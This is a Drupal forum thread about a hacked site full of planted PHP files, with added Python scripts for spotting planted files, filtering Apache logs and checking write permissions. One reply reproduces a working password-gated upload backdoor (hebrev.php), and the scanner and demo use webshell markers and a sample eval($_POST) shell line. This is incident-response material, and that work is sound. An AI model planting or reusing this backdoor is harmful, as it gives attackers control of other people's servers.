Today I discovered a file on my host which I couldn't recognise, and contacted my host, who said they didn't know what this file was for: sites/all/themes/contrib/xmlwriter_end_document.php. It shows a box where a password should be pasted and a button with >>. Does someone know what this could be, please?

They looked at many of my other old test sites, both Drupal 6 and Drupal 7, and found these mysterious files.
But how can I be sure they are from a hacker and should be deleted, or that they are OK?

sites/all/modules/contrib/views/theme/end.php
sites/all/modules/contrib/views/modules/printf.php
sites/all/modules/contrib/kml/xmlwriter_write_element_ns.php
sites/all/modules/contrib/ctools/page_manager/js/session_register.php
sites/all/modules/contrib/ctools/images/array_walk_recursive.php
sites/all/modules/contrib/ctools/ctools_ajax_sample/strchr.php
sites/all/modules/contrib/advanced_help/ltrim.php
sites/all/modules/contrib/location/plugins/relationships/ob_get_length.php
sites/all/modules/contrib/date/theme/xmlwriter_end_dtd.php
sites/all/modules/contrib/devel/FirePHPCore/lib/is_resource.php
sites/all/modules/contrib/gmap/markers/iconv_mime_decode.php
sites/all/modules/contrib/gmap/markers/zend_logo_guid.php
sites/all/themes/contrib/tao/drupal/opendir.php
modules/statistics/get_class_methods.php
modules/syslog/quotemeta.php
modules/php/stream_get_transports.php
misc/constant.php

NOT Drupal
div/xmlwriter_write_pi.php
div/import_request_variables.php
div/bcpow.php
div/fprintf.php
div/s2g9b8.php
div/com_load_typelib.php
div/setlocale.php
div/xml_parser_free.php
div/json_decode.php
div/register_shutdown_function.php
div/xml_parser_create_ns.php
div/key.php
div/is_object.php
div/dj73eb.php
div/getservbyport.php
div/register_tick_function.php
div/tan.php
div/simplexml_import_dom.php
div/abs.php
div/rename.php

NEW_storelocator_v3_tutorial/strpos.php
NEW_storelocator_v3_tutorial/chr.php
NEW_storelocator_v3_tutorial/array_udiff_uassoc.php
NEW_storelocator_v3_tutorial/g0vpnug.php
NEW_storelocator_v3_tutorial/xmlwriter_end_attribute.php
NEW_storelocator_v3_tutorial/get_class.php
NEW_storelocator_v3_tutorial/hash_algos.php
NEW_storelocator_v3_tutorial/stream_wrapper_register.php
NEW_storelocator_v3_tutorial/cc5ul.php
NEW_storelocator_v3_tutorial/decoct.php

storelocator_v3_tutorial/in_array.php
storelocator_v3_tutorial/rawurlencode.php
storelocator_v3_tutorial/odbc_data_source.php
storelocator_v3_tutorial/str_shuffle.php
storelocator_v3_tutorial/fileinode.php
storelocator_v3_tutorial/stream_set_write_buffer.php
storelocator_v3_tutorial/gzencode.php
storelocator_v3_tutorial/token_get_all.php
storelocator_v3_tutorial/number_format.php

profiles/u9krgfm.php
profiles/xmlwriter_open_memory.php
sites/all/modules/views/css/iconv_strpos.php
sites/all/modules/views/css/ftruncate.php
sites/all/modules/cck/modules/optionwidgets/rsort.php
sites/all/modules/cck/translations/help/de/gzclose.php
sites/all/modules/location/handlers/basename.php
sites/all/modules/admin_menu/deg2rad.php
sites/all/modules/admin_menu/tests/getmyuid.php
sites/all/modules/admin_menu/date_modify.php
sites/all/modules/gmap/markers/small/fclose.php
sites/all/modules/gmap/markers/small/atan.php
sites/all/modules/gmap/tests/array_udiff.php
sites/all/modules/custom_links/ftp_delete.php
modules/statistics/chgrp.php
modules/search/pathinfo.php
themes/chameleon/chmod.php
misc/farbtastic/strtoupper.php
scripts/r9595p.php

profiles/dea5xlo.php
sites/all/modules/cck/modules/nodereference/translations/stream_set_timeout.php
sites/all/modules/cck/modules/content_copy/translations/session_module_name.php
sites/all/modules/cck/modules/content_permissions/filter_input_array.php
sites/all/modules/rules/getmyinode.php
sites/all/modules/node_import/supported/filefield/fseek.php
sites/all/modules/services/auth/is_double.php
sites/all/modules/services/services/user_service/debug_zval_dump.php
sites/all/modules/advanced_help/translations/array_uintersect_uassoc.php
sites/all/modules/devel/ini_get.php
sites/all/modules/user_force_term/basename.php
sites/all/modules/conditional_styles/translations/usort.php
modules/upload/readdir.php
modules/aggregator/array_diff.php
modules/views_bonus/paged_feed/ereg_replace.php
modules/php/readgzfile.php
themes/garland/assert_options.php
themes/chameleon/marvin/odbc_tableprivileges.php
scripts/yyj9e7.php

And a lot of other sites and files which I will not show now.

Best regards,
Tine

Comments

VM wrote:

Most, if not all, of them aren't Drupal files. You can verify by downloading new copies of the modules and themes and comparing the contents.

That said, if files are being generated on your server account you need to find out how that is occurring and close that security hole. Otherwise, when you delete the files they will likely be back again shortly after deletion. The Apache logs should be helpful in determining when those files were placed there. The files' dates and times should be helpful in filtering the logs.
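The comparison VM suggests can be automated. The following is an added example written for this thread, not code from Drupal, from the security_review module or from any poster here: it walks a site tree, reports every file that is absent from a freshly downloaded copy, and additionally flags .php files that sit in directories which should only hold static assets, that carry short random names like those listed above, or that contain "$default_action = 'FilesMan'" (the default action string at the top of the WSO PHP webshell) or a move_uploaded_file() call. The directory names, file contents and paths in demo() are constructed to mirror the ones reported in the thread.

```python
"""Triage a Drupal tree for planted PHP files, with and without a pristine copy.

Added example for this thread; not code from Drupal or from any poster.
Paths and file contents below are constructed to mirror the ones reported.
"""
import os
import re
import tempfile

# "$default_action = 'FilesMan'" is the default action of the WSO PHP webshell;
# move_uploaded_file() on attacker-controlled paths is the generic dropper pattern.
SHELL_MARKERS = [
    re.compile(r"\$default_action\s*=\s*'FilesMan'"),
    re.compile(r"move_uploaded_file\s*\("),
]
# Directory names that hold only static assets in a Drupal module or theme.
ASSET_DIRS = {"css", "js", "images", "markers", "translations"}
# Short random names such as s2g9b8.php or u9krgfm.php.
RANDOM_NAME = re.compile(r"^[a-z0-9]{5,7}\.php$")


def scan_tree(root, pristine=None):
    """Return sorted (relative_path, [reasons]) for every suspicious file under root.

    pristine, if given, is a freshly downloaded copy of the same tree: any file
    present in root but absent from pristine is reported.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root)
            reasons = []
            if pristine is not None and not os.path.exists(os.path.join(pristine, rel)):
                reasons.append("not in pristine copy")
            if fname.lower().endswith(".php"):
                if set(rel.split(os.sep)[:-1]) & ASSET_DIRS:
                    reasons.append("php in asset directory")
                if RANDOM_NAME.match(fname):
                    reasons.append("random short name")
                with open(full, "rb") as fh:
                    text = fh.read().decode("utf-8", "replace")
                for marker in SHELL_MARKERS:
                    if marker.search(text):
                        reasons.append("marker: " + marker.pattern)
            if reasons:
                findings.append((rel, reasons))
    return sorted(findings)


def _write(base, rel, content):
    path = os.path.join(base, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(content)


def demo():
    """Constructed live tree vs. pristine tree; returns scan_tree()'s findings."""
    tmp = tempfile.mkdtemp()
    live, clean = os.path.join(tmp, "live"), os.path.join(tmp, "clean")
    for base in (live, clean):  # legitimate files exist in both copies
        _write(base, "sites/all/modules/contrib/views/views.module", "<?php\n// real module\n")
        _write(base, "sites/all/modules/contrib/views/css/views.css", "body {}\n")
    # planted files, present only in the live tree (contents are constructed)
    _write(live, "sites/all/modules/contrib/views/css/iconv_strpos.php",
           "<?php\n$default_action = 'FilesMan';\n")
    _write(live, "div/s2g9b8.php", "<?php eval($_POST['c']);\n")
    _write(live, "profiles/xmlwriter_open_memory.php",
           "<?php @move_uploaded_file($_FILES['m']['tmp_name'], $_POST['d']);\n")
    return scan_tree(live, clean)


if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", "; ".join(reasons))
```

On a real host, point scan_tree() at the live docroot and at an unpacked download of the same Drupal core, modules and themes. Files that fail only the pristine check still need a look, since legitimate local customisations also show up there, but anything that hits a marker or sits as .php in a css/ or images/ directory is a planted file.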

tinem wrote:

Thanks a lot for trying to help.

I have found out that all these strange files, both online and offline, include "$default_action = 'FilesMan';", and my antivirus software rings if I try to send one of these files as an attachment to my shared host. I'm not sure what the hacker gets out of using these files, anyone?

But how do I get ALL of this solved so I can be sure all infected files are deleted? My host says that these logs don't tell anything about how to stop these hackers, but what does the Drupal community do when these things happen to their users? Is there a step-by-step tutorial to get ALL of this solved so I can do it myself and learn what to do the next time, please?

VM wrote:

All files can be deleted and your Drupal files replaced with new downloads. You still have to figure out how your server was hacked, else it is likely you will be hacked again. If your host is saying that the logs won't help, you need to switch hosts. Logs can aid in better understanding how and when your server account was accessed. The timestamps on the current files should aid them in narrowing down where to look in the logs.
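Here is what "use the file timestamps to narrow down the logs" looks like in practice. This is an added example for the thread, not the hoster's tooling or anything from Drupal: it parses Apache combined-format access-log lines, keeps only requests within a window around a planted file's modification time, and from those keeps the requests for .php paths that a Drupal 6/7 site never serves directly (everything goes through index.php, cron.php, xmlrpc.php, update.php or install.php). The log lines are constructed for the example; the attacker IP is the one named later in this thread. On a real host the window centre comes from os.stat(path).st_mtime of one of the planted files.

```python
"""Pull the Apache access-log lines that matter around a planted file's mtime.

Added example for this thread; not the hoster's or Drupal's tooling. The log
lines below are constructed; on a real host read them from the access log and
take mtime from os.stat(path).st_mtime of a planted file.
"""
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# The only .php files a Drupal 6/7 site serves directly; anything else is odd.
DRUPAL_ENTRYPOINTS = {"/index.php", "/cron.php", "/xmlrpc.php", "/update.php", "/install.php"}


def parse_line(line):
    """Dict of fields for one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def suspicious_requests(lines, mtime, window_minutes=30):
    """Requests within +/- window_minutes of mtime for .php paths Drupal never serves."""
    lo = mtime - timedelta(minutes=window_minutes)
    hi = mtime + timedelta(minutes=window_minutes)
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not (lo <= rec["ts"] <= hi):
            continue
        if rec["path"].endswith(".php") and rec["path"] not in DRUPAL_ENTRYPOINTS:
            hits.append(rec)
    return hits


def summarize(hits):
    """Counts per client IP and per requested path, the two things to chase next."""
    return Counter(r["ip"] for r in hits), Counter(r["path"] for r in hits)


# Constructed sample log; only the attacker IP is taken from the thread.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Oct/2013:13:58:02 +0100] "GET /node/12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
95.211.22.216 - - [30/Oct/2013:14:01:40 +0100] "GET /sites/all/modules/contrib/ctools/ctools_plugin_example/plugins/hebrev.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
95.211.22.216 - - [30/Oct/2013:14:02:11 +0100] "POST /sites/all/modules/contrib/ctools/ctools_plugin_example/plugins/hebrev.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"
95.211.22.216 - - [30/Oct/2013:14:03:50 +0100] "POST /sites/all/modules/contrib/views/css/iconv_strpos.php HTTP/1.1" 200 9412 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Oct/2013:14:04:30 +0100] "POST /index.php?q=user/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Oct/2013:16:30:00 +0100] "GET /misc/constant.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""


def demo():
    """Run the filter over SAMPLE_LOG around an assumed mtime of 14:05 local time."""
    mtime = datetime(2013, 10, 30, 14, 5, tzinfo=timezone(timedelta(hours=1)))
    hits = suspicious_requests(SAMPLE_LOG.splitlines(), mtime)
    by_ip, by_path = summarize(hits)
    return hits, by_ip, by_path


if __name__ == "__main__":
    hits, by_ip, by_path = demo()
    for rec in hits:
        print(rec["ts"].isoformat(), rec["ip"], rec["method"], rec["path"], rec["status"])
    print("by ip:", dict(by_ip))
    print("by path:", dict(by_path))
```

Two caveats a practitioner would add: the attacker can reset a file's mtime with touch, so also look at st_ctime, which cannot be set from userland; and the request that planted the first file is often an ordinary-looking POST to a legitimate path, so once you have the attacker IP from the .php hits, filter the whole log on that IP and walk backwards from the first hit.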

tinem wrote:

I have looked in many of the access logs from my host and used AVAST and FlashFXP to look in these sites, and they all include "$default_action = 'FilesMan';" and a lot of strange code, and they all come from one particular IP address.

One other file which I think he maybe uses is in sites/all/modules/contrib/ctools/ctools_plugin_example/plugins/hebrev.php and looks like this:

<?php
// Upload backdoor: only acts when a file is posted AND the md5 of the
// "nick" field matches a hard-coded hash (a crude password check).
if(!empty($_FILES['message']['name']) AND (md5($_POST['nick']) == '211df628e55249fce7074c90be70e56b')) {
	// "security_code" is really the destination directory; it defaults to
	// the directory this script lives in.
	$security_code = $_POST['security_code'];
	if ( !$security_code ) $security_code = ".";
	$security_code = rtrim($security_code, "/");
	$tmp_name = $_FILES['message']['tmp_name'];
	$name = $_FILES['message']['name'];
	// Moves the upload into place under its original name, so any .php
	// file the attacker posts lands on disk ready to be executed.
	@move_uploaded_file($tmp_name, $security_code."/".$name) ? print "<b>Message sent!</b><br/>" : print "<b>Error!</b><br/>";
} /*3339*/ print '<html>
    <head>
    <title>Search form</title>
    </head>
    <body>
    <form enctype="multipart/form-data" action="" method="POST">
    Message: <br/><input name="message" type="file" />
    <br/>Security Code: <br/><input name="security_code" value=""/><br/>
	<br/>Nick: <br/><input name="nick" value=""/><br/>
    <input type="submit" value="Sent" />
    </form>
    </body>
    </html>';

Could this be the hacker that made this?

Happy Christmas. :-)

VM wrote:

Could this be the hacker that made this?

If the file isn't included in the module in question, I would consider the file unsafe. To verify which files are included in a module you can download a new copy of the module.

tinem wrote:

It should NOT be there.

What do these hackers gain placing all these php-files on peoples domains?

This http://www.unphp.net/decode/a2777f8adfdd2d44d738f6baf24c525a/ includes the same as some of my hacker's files, and until now they all come from this hacker: http://www.abuseipdb.com/report-history/95.211.22.216. I asked my shared host to search for this idiot and IP but am still waiting for an answer. People are enjoying Christmas, I think, but not me; I can't relax before all this is solved. :-(

VM wrote:

What do these hackers gain placing all these php-files on peoples domains?

Depends on what the files do when run.

tinem wrote:

depends on what the files do when run.

Yes, but I don't think I can ever figure this out, though I keep on struggling to find a solution to all this.

I have read tons of threads found on Google about hacked Drupal sites and have found this great module https://drupal.org/project/security_review. After running this on my sites I found "some files and directories in your install are writeable by the server":

Security review
Web server file system permissions
It is dangerous to allow the web server to write to files inside the document root of your server. Doing so would allow Drupal to write files that could then be executed. An attacker might use such a vulnerability to take control of your site. An exception is the files directory which Drupal needs permission to write to in order to provide features like file attachments.
In addition to inspecting files, this test attempts to create and write to files. Look in your security_review module directory on the server for files named file_write_test.YYYYMMDDHHMMSS and for a file called IGNOREME.txt which gets a timestamp appended to it if it is writeable.

Edited 5.1.2013, 14:02: I see that IGNOREME.txt does NOT have a timestamp so maybe all is OK then?

And a LOT of files are shown. The .htaccess file is 644. I contacted my host and they said I didn't need to change anything here, but I don't know?

"Unsafe file extensions are allowed in uploads." It looks like the hacker has given access to PHP files, which may be the reason he could upload all these PHP files, but I don't know. I have of course changed this now.

And a couple of more warnings which I still have to study.
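The Security Review finding quoted above can be reproduced outside Drupal, which is useful when you want to check a whole account from the command line or when the web server runs as a different Unix user than the one that owns the files. The following is an added example in the spirit of that check and is not the security_review module's own code: it walks a docroot and lists every file and directory that a given uid/gid could write, skipping the files directory that Drupal legitimately needs. The tree in demo() is constructed, and the web server identity is assumed (on a real host pass the uid/gid of www-data, apache or whatever account the server runs as). A writable directory is reported alongside writable files because the server can create new .php files in it even when every existing file is read-only, which is exactly the pattern in the file lists at the top of this thread.

```python
"""Find files under a Drupal docroot that the web server account could write.

Added example for this thread, in the spirit of the Security Review check quoted
above; it is not that module's code. The tree below is constructed, and the web
server's uid/gid are assumed (pass www-data's real ids on your host).
"""
import os
import stat
import tempfile


def writable_by(st, uid, gid):
    """True if an account with this uid/gid could write the object described by st."""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid == gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def server_writable(docroot, uid, gid, allowed=("sites/default/files",)):
    """Sorted relative paths (dirs and files) writable by uid/gid, minus allowed upload dirs.

    A writable directory matters as much as a writable file: the server can
    create new .php files in it even if every existing file is read-only.
    """
    found = []
    for dirpath, dirs, files in os.walk(docroot):
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot)
            if any(rel == p or rel.startswith(p + os.sep) for p in allowed):
                continue
            if writable_by(os.lstat(full), uid, gid):
                found.append(rel)
    return sorted(found)


def demo():
    """Constructed docroot: 644 files, one world-writable asset dir and file."""
    root = tempfile.mkdtemp()
    files = {
        "index.php": 0o644,
        ".htaccess": 0o644,
        "sites/all/modules/contrib/views/css/views.css": 0o666,  # world-writable: bad
        "sites/default/files/logo.png": 0o666,                  # upload dir: expected
    }
    for rel, mode in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()
        os.chmod(full, mode)
    for dirpath, dirs, _files in os.walk(root):  # normalise dirs to 755 regardless of umask
        for d in dirs:
            os.chmod(os.path.join(dirpath, d), 0o755)
    os.chmod(os.path.join(root, "sites/all/modules/contrib/views/css"), 0o777)  # bad
    owner = os.stat(root)
    # Shared hosting usually runs the web server under a different account than
    # the site owner; model that by using ids that are not the owner's.
    return server_writable(root, owner.st_uid + 1, owner.st_gid + 1)


if __name__ == "__main__":
    for rel in demo():
        print("server-writable:", rel)
```

Note what this does and does not say about the 644 .htaccess mentioned above: with the web server running as a different account, a 644 file is readable but not writable by it, which is the intended state for everything outside the files directory. If the server runs as the same account that owns the files (common on cheap shared hosting), every 644 file and 755 directory is writable by it, the IGNOREME.txt test passes or fails on other grounds, and the only real protection left is keeping the upload handlers and the code itself free of holes.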

VM wrote:

I received your email (please don't contact me for personal support). I'm not sure what else I can help with here.

tinem wrote:

OK, sorry.

1. Edited 5.1.2013, 14:02: I see that IGNOREME.txt does NOT have a timestamp so maybe all is OK then?

2. And a LOT of files are shown. The .htaccess file is 644. I contacted my host and they said I didn't need to change anything here, but I don't know?

3. Does Drupal have something like a wiki page where they tell about all the things people should do to clean up their sites after a hacker, about what these hackers gain out of doing this, and about what the different kinds of attacks are called and what they do to your sites?

VM wrote:

1. I can't answer. I've never used the security review module.
2. To better understand file permissions in octal modes see: http://en.wikipedia.org/wiki/Chmod
3. No. A comprehensive wiki would be difficult to maintain, and most aren't Drupal-specific. At this point, no one can be sure what happened to your site is Drupal-specific either, as there isn't enough information about how the site/server was accessed. What hackers can gain can be researched on the interwebs, as well as what different types of attacks there are.

tinem wrote:

How do people remember ALL this info, and where do they keep it so hackers do not get it? If you don't want to post it here, please send me a direct mail, thanks.

VM wrote:

Good old-fashioned pencil and paper. However, a password is only as strong as the user makes it. Avoid dictionary words, numeric strings like birthdays, and so on.

Jaypan wrote:

Also note that you should use SFTP (FTP over SSH) if possible, rather than FTP, as FTP itself is an insecure protocol.

tinem wrote:

I have now spent days cleaning up 2 log files from 2 different days from one of the hacked sites and from the hacker's IP address, and it looks like this:

http://tinemuller.dk/div/drupal6_hacked_30.10_2013_site_1.html
http://tinemuller.dk/div/drupal6_hacked_31.10_2013_site_1.html

Does this tell you anything, please?

VM wrote:

Tells you that someone or something is trying to access the files from 95.211.22.216.

You should consider blocking the IP trying to access.